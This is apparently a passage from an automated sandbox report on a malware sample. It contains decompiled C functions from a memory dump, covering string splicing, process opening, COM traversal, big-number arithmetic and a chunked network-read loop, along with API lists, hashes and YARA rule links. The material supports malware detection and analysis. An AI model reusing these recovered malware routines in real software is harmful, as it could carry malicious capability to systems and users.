Opcode Fuzzy Hash: 14b0cf5e1745e6b20b26e65504a303ce44a1879d031fce6fb37311801ffb7af1
Instruction Fuzzy Hash: AB519073A24205AFDB11DF69C841B5EB7F9FF49728B10056DE806E7260E731E9218F49

Uniqueness

Uniqueness Score: -1.00%

Function 00DC1650, Relevance: 7.6, APIs: 5, Instructions: 75
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00DC1650(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0xdcd100(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0xdcd1f0, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}

0x00dc1658
0x00dc165d
0x00dc165f
0x00dc1666
0x00dc1678
0x00dc1678
0x00dc167c
0x00dc167e
0x00dc1681
0x00dc1684
0x00dc168d
0x00dc1697
0x00dc169b
0x00dc16a0
0x00dc16b6
0x00dc16ba
0x00dc170b
0x00dc16bc
0x00dc16bc
0x00dc16c4
0x00dc16d3
0x00dc16d8
0x00dc16e8
0x00dc16ee
0x00dc16f9
0x00dc1703
0x00dc1707
0x00dc1707
0x00dc16ba
0x00dc1712
0x00dc1719

APIs

lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 00DC1684
RtlAllocateHeap.NTDLL(00000000,?), ref: 00DC16B0
memcpy.NTDLL(00000000,0000000B,0000000B), ref: 00DC16C4
memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DC16D3
memcpy.NTDLL(00000000,0000000B,?,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 00DC16EE

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: b518fe57261f1e53e133eb8bd4fa7158b87575b866135f28f5be1f697e9a9761
Instruction ID: 09e803e89340f89457bbc442a5207cd5534dfb2fe33b45e45ca1ec8eced91242
Opcode Fuzzy Hash: b518fe57261f1e53e133eb8bd4fa7158b87575b866135f28f5be1f697e9a9761
Instruction Fuzzy Hash: EE216D7A90021AAFCF118F68CC44F9EBF79EF85300F188158F804A7315C630A915CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 702A3B96, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 702A3BAE

Part of subcall function 7029C6CF: HeapFree.KERNEL32(00000000,00000000,?,7029A4F1), ref: 7029C6E5
Part of subcall function 7029C6CF: GetLastError.KERNEL32(?,?,7029A4F1), ref: 7029C6F7

_free.LIBCMT ref: 702A3BC0
_free.LIBCMT ref: 702A3BD2
_free.LIBCMT ref: 702A3BE4
_free.LIBCMT ref: 702A3BF6

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d8d600fcef8ce8b76e4875a885f9961188719d162a48b1145f07d79dba3e4237
Instruction ID: 40b26ad094e8785b229defb0451d0be5f69aa012b49c7fb05c76ff252c801548
Opcode Fuzzy Hash: d8d600fcef8ce8b76e4875a885f9961188719d162a48b1145f07d79dba3e4237
Instruction Fuzzy Hash: ACF0E7735582019BC654DF59E9CAE1EB3EEAA807147703C09F90AE7521CF30FCA08E68

Uniqueness

Uniqueness Score: -1.00%

Function 00DC7A5D, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00DC7A5D(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xdcd224 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xdcd214 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xdcd210 = _t6;
				 *0xdcd21c = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xdcd20c = _t7;
				if(_t7 == 0) {
					 *0xdcd20c =  *0xdcd20c | 0xffffffff;
				}
				return 0;
			}

0x00dc7a65
0x00dc7a6d
0x00dc7a72
0x00000000
0x00dc7abf
0x00dc7a74
0x00dc7a7c
0x00dc7abc
0x00000000
0x00dc7abc
0x00dc7a7e
0x00dc7a83
0x00dc7a95
0x00dc7a9a
0x00dc7aa0
0x00dc7aa8
0x00dc7aad
0x00dc7aaf
0x00dc7aaf
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00DC8753,?,?,00000001), ref: 00DC7A65
GetVersion.KERNEL32(?,00000001), ref: 00DC7A74
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00DC7A83
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00DC7AA0
GetLastError.KERNEL32(?,00000001), ref: 00DC7ABF

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: d59bca8a1547548d47697961448208ec0df34f277652043acf6d1e72bb736ab0
Instruction ID: a703fb8845c0d2584edefb06e616050df88a5b6def3c5fd87226a83db849f2af
Opcode Fuzzy Hash: d59bca8a1547548d47697961448208ec0df34f277652043acf6d1e72bb736ab0
Instruction Fuzzy Hash: F8F0F4B0A94303EAD7209B24AD09F187BA2A708740F148529F25AC63E0E6708A01AF39

Uniqueness

Uniqueness Score: -1.00%

Function 702A069E, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 702A0838

Strings

*?, xrefs: 702A06E1

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 3bcf00fbe7c83672af3c444a8453a29fb2d6e3d48c0e41ffb646aa8c76bc52e5
Instruction ID: 32057173ecd0079e1b5ace7499e0d89d8d5776ce97f5f0989248f3d4dfabfa4b
Opcode Fuzzy Hash: 3bcf00fbe7c83672af3c444a8453a29fb2d6e3d48c0e41ffb646aa8c76bc52e5
Instruction Fuzzy Hash: 7B612BB6D0021A9FDB15CFA8C8815DDFBF9EF48350B244169E815E7300DB35AE518F94

Uniqueness

Uniqueness Score: -1.00%

Function 70296A1E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 70296A43
CatchIt.LIBVCRUNTIME ref: 70296B29

Strings

MOC, xrefs: 70296A55
RCC, xrefs: 70296A5D

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: 69758cb0d1cf3d841eb63827523b49ca6477ae4856f4270b8b2de6d4649e8056
Instruction ID: 892343692f729aa20386d4e9c8313d5d7f91e9f58d3e373dd233406d499e406a
Opcode Fuzzy Hash: 69758cb0d1cf3d841eb63827523b49ca6477ae4856f4270b8b2de6d4649e8056
Instruction Fuzzy Hash: DB414B7291020AAFDF06CF94CD85EAEBBB5FF48314F158159F90AB6210E335A960DF58

Uniqueness

Uniqueness Score: -1.00%

Function 702A203B, Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 702A20C2

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: dea6f633a265625f5a1b94ac9983c9ac132fdbc5cbf7662bf455da5b77896b96
Instruction ID: 2b5930c828fa93f40b7967926650d715502435b197d8b2a7f15fd9a840862b67
Opcode Fuzzy Hash: dea6f633a265625f5a1b94ac9983c9ac132fdbc5cbf7662bf455da5b77896b96
Instruction Fuzzy Hash: CBB116B39042469FDB06CF6CC8417AEBBF5EF55300F2481AADC46BB245DA389D59CB60

Uniqueness

Uniqueness Score: -1.00%

Function 70296411, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 702964D8
___AdjustPointer.LIBCMT ref: 702964FB
___AdjustPointer.LIBCMT ref: 70296597

Memory Dump Source

Source File: 00000014.00000002.473412155.0000000070260000.00000020.00020000.sdmp, Offset: 70260000, based on PE: false

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: f1f59f9964c05081db8a1be3b94064d59a2542cd53179bdae29f364eef4edc71
Instruction ID: 8f456cfbcb0c30f5b4469da190453300a47e8fa33941d082dc8e45c405fe5916
Opcode Fuzzy Hash: f1f59f9964c05081db8a1be3b94064d59a2542cd53179bdae29f364eef4edc71
Instruction Fuzzy Hash: BF51C0B3A212029FDB168F51D849B6E77F9EF00310F51412DE85667694E735EC60CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 00DC14BD, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00DC14BD(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xdcd230; // 0x434a5a8
					_t5 = _t102 + 0xdce038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xdcc2c8);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xdcd230; // 0x434a5a8
												_t28 = _t108 + 0xdce0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xdcd230; // 0x434a5a8
														_t33 = _t78 + 0xdce078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00dc14c2
0x00dc14cb
0x00dc14cc
0x00dc14d0
0x00dc14d6
0x00dc14dc
0x00dc14e5
0x00dc14eb
0x00dc14f5
0x00dc14f7
0x00dc14fd
0x00dc1502
0x00dc150d
0x00dc1515
0x00dc1518
0x00dc163b
0x00dc151e
0x00dc151e
0x00dc152b
0x00dc1531
0x00dc1537
0x00dc153b
0x00dc1541
0x00dc154e
0x00dc1552
0x00dc1558
0x00dc155b
0x00dc1561
0x00dc1567
0x00dc156d
0x00dc1570
0x00dc1573
0x00dc1579
0x00dc1582
0x00dc1588
0x00dc1589
0x00dc158c
0x00dc158d
0x00dc158e
0x00dc1596
0x00dc1597
0x00dc1598
0x00dc159a
0x00dc159e
0x00dc15a2
0x00000000
0x00000000
0x00dc15a8
0x00dc15b1
0x00dc15b7
0x00dc15c1
0x00dc15c5
0x00dc15c7
0x00dc15d4
0x00dc15d8
0x00dc15e0
0x00dc15e5
0x00dc15f7
0x00dc15f9
0x00dc15ff
0x00dc15ff
0x00dc1608
0x00dc1608
0x00dc160a
0x00dc1610
0x00dc1610
0x00dc1613
0x00dc1619
0x00dc161c
0x00dc1625
0x00000000
0x00000000
0x00000000
0x00dc1625
0x00dc1579
0x00dc1573
0x00dc155b
0x00dc162b
0x00dc162b
0x00dc1631
0x00dc1631
0x00dc1637
0x00dc1637
0x00dc1640
0x00dc1646
0x00dc1646
0x00dc1502
0x00dc164f

APIs

SysAllocString.OLEAUT32(00DCC2C8), ref: 00DC150D
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00DC15EF
SysFreeString.OLEAUT32(00000000), ref: 00DC1608
SysFreeString.OLEAUT32(?), ref: 00DC1637

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: d2869b40e5f474b5b892de2a451072dc02b2d97cf2c7843186bc17eeb2755130
Instruction ID: 69116b3abb0c8ddfd9af0a3ab49faae7b34dbf43b6c8207c5be091eea3127cd2
Opcode Fuzzy Hash: d2869b40e5f474b5b892de2a451072dc02b2d97cf2c7843186bc17eeb2755130
Instruction Fuzzy Hash: 5D512875D0051AEFCB01DFA8C988DAEF7B9EF89704B188598E905EB211D771AD01CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00DC492B, Relevance: 6.2, APIs: 4, Instructions: 152memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 00DC496C
SysFreeString.OLEAUT32(00000000), ref: 00DC4A4F

Part of subcall function 00DC14BD: SysAllocString.OLEAUT32(00DCC2C8), ref: 00DC150D

SafeArrayDestroy.OLEAUT32(?), ref: 00DC4AA3
SysFreeString.OLEAUT32(?), ref: 00DC4AB1

Part of subcall function 00DC13AD: Sleep.KERNEL32(000001F4), ref: 00DC13F5

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 928e3726d59cc18fca3ecbde68766c6d74d848649e998df4c7ee984617450adf
Instruction ID: dd09a5e857c2513b0d98195e75187f42e82cf3848be4d4c3c020e4937a5fd2f0
Opcode Fuzzy Hash: 928e3726d59cc18fca3ecbde68766c6d74d848649e998df4c7ee984617450adf
Instruction Fuzzy Hash: B351FB7690060BAFCB00DFE4C894DAEB7B6FF88344B19896CE515EB210D7319D45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00DC44C2, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00DC44C2(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00DC43C6(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00DCA966(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E00DC8B07(_t101,  &_v236, _a8, _t96 - _t81);
					E00DC8B07(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E00DCA966(_t101,  &E00DCD168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00DCA966(_a16, _a4);
						E00DC3A1E(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00DCAEE0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00DCAEDA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E00DC47A0(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E00DC337A(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00DC72D3(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(_a8 * 4 +  &E00DCD168) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00dc44c5
0x00dc44d1
0x00dc44d7
0x00dc44dc
0x00dc44e0
0x00dc463d
0x00dc4641
0x00dc4641
0x00dc44e6
0x00dc44ea
0x00dc44f0
0x00dc44f1
0x00dc44fc
0x00dc4502
0x00dc4507
0x00dc450a
0x00dc4524
0x00dc4530
0x00dc4539
0x00dc4543
0x00dc4548
0x00dc454a
0x00dc454d
0x00dc45fb
0x00dc4601
0x00dc4612
0x00dc4625
0x00dc4635
0x00000000
0x00dc463a
0x00dc4556
0x00dc455d
0x00dc4561
0x00dc4567
0x00dc4569
0x00dc456b
0x00dc456d
0x00dc456f
0x00dc4579
0x00dc457e
0x00dc4580
0x00dc4582
0x00dc4583
0x00dc4584
0x00dc4585
0x00dc458c
0x00dc4593
0x00dc4596
0x00dc4596
0x00dc4563
0x00dc4563
0x00dc4563
0x00dc459e
0x00dc45a6
0x00dc45af
0x00dc45b4
0x00dc45b4
0x00dc45b9
0x00000000
0x00000000
0x00dc45bb
0x00dc45be
0x00dc45c8
0x00000000
0x00000000
0x00dc45ca
0x00dc45ca
0x00dc45d4
0x00dc45b4
0x00dc45b9
0x00000000
0x00000000
0x00000000
0x00dc45b9
0x00dc45de
0x00dc45e1
0x00dc45e4
0x00dc45eb
0x00dc45eb
0x00dc45f8
0x00000000
0x00dc45f8
0x00dc44f3
0x00dc44f7
0x00dc44f8
0x00dc44fa
0x00000000
0x00000000
0x00000000
0x00dc44fa
0x00000000

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00DC456F
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00DC4585
memset.NTDLL ref: 00DC4625
memset.NTDLL ref: 00DC4635

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469561184.0000000000DCF000.00000002.00000001.sdmp Download File

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 17b60a711549b5becc7b54a429766e97ca4feaf7d68f5bb8f31d26c9ecc802d6
Instruction ID: 4bf85dda8a5c13978677f4890138e020986ad91c6c9f8fe54b19bb6c1db71eeb
Opcode Fuzzy Hash: 17b60a711549b5becc7b54a429766e97ca4feaf7d68f5bb8f31d26c9ecc802d6
Instruction Fuzzy Hash: 82417D71A0024AABDB10DFA8CC51FEE7779EF55310F10852DF919A7180DB709E558B70

Uniqueness

Uniqueness Score: -1.00%

Function 00DC43A3, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E00DC43A3(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_push( &_v24);
							_push(1);
							_push(0);
							if( *0xdcd138() != 0) {
								_v8 = 8;
							} else {
								_t47 = E00DC75C4(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xdcd224, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00DC4C31(_v20);
											if(_v8 == 0) {
												_v8 = E00DC4036(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00DC7F7F(__eax);
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00dc43a4
0x00dc43aa
0x00dc43b5
0x00dc43b5
0x00dc43b7
0x00dc6e0b
0x00dc6e0e
0x00dc6e17
0x00dc6e1a
0x00dc6e1d
0x00dc6e25
0x00dc6f23
0x00dc6f2e
0x00dc6f31
0x00dc6f33
0x00000000
0x00dc6f33
0x00dc6e2b
0x00dc6e2e
0x00dc6f36
0x00dc6f36
0x00dc6e34
0x00dc6e37
0x00dc6e38
0x00dc6e3a
0x00dc6e43
0x00dc6f1a
0x00dc6e49
0x00dc6e4f
0x00dc6e56
0x00dc6e59
0x00dc6f08
0x00dc6e5f
0x00000000
0x00dc6e5f
0x00dc6e5f
0x00dc6e5f
0x00dc6e5f
0x00dc6e64
0x00dc6e66
0x00dc6e66
0x00dc6e73
0x00dc6e7b
0x00000000
0x00000000
0x00dc6e7d
0x00dc6e8a
0x00dc6e90
0x00dc6e90
0x00dc6e93
0x00000000
0x00000000
0x00dc6e95
0x00dc6ea0
0x00dc6eb4
0x00dc6eea
0x00dc6eb6
0x00dc6eb6
0x00dc6ebd
0x00dc6ec5
0x00000000
0x00dc6ec7
0x00dc6ec7
0x00dc6ed2
0x00dc6ed5
0x00dc6edc
0x00000000
0x00dc6edc
0x00dc6ed5
0x00dc6ec5
0x00dc6eed
0x00dc6ef0
0x00dc6ef8
0x00dc6f03
0x00dc6f03
0x00000000
0x00dc6ef8
0x00dc6e9d
0x00000000
0x00dc6edf
0x00dc6edf
0x00000000
0x00dc6ee8
0x00dc6f0f
0x00dc6f0f
0x00dc6f15
0x00dc6f15
0x00dc6e43
0x00dc6e2e
0x00dc6f40
0x00dc43ac
0x00dc43ac
0x00dc43b3
0x00dc43be
0x00000000
0x00000000
0x00000000
0x00dc43b3

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00DC6CD4,00000000,?), ref: 00DC6EA7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00DC6CD4,00000000,?,?), ref: 00DC6EC7

Part of subcall function 00DC7F7F: wcstombs.NTDLL ref: 00DC803F

Memory Dump Source

Source File: 00000014.00000002.469493764.0000000000DC1000.00000020.00000001.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000014.00000002.469471880.0000000000DC0000.00000004.00000001.sdmp Download File
Associated: 00000014.00000002.469527134.0000000000DCC000.00000002.00000001.sdmp Download File
Associated: 00000014.00000002.469542653.0000000000DCD000.00000004.00000001.sdmp Download File
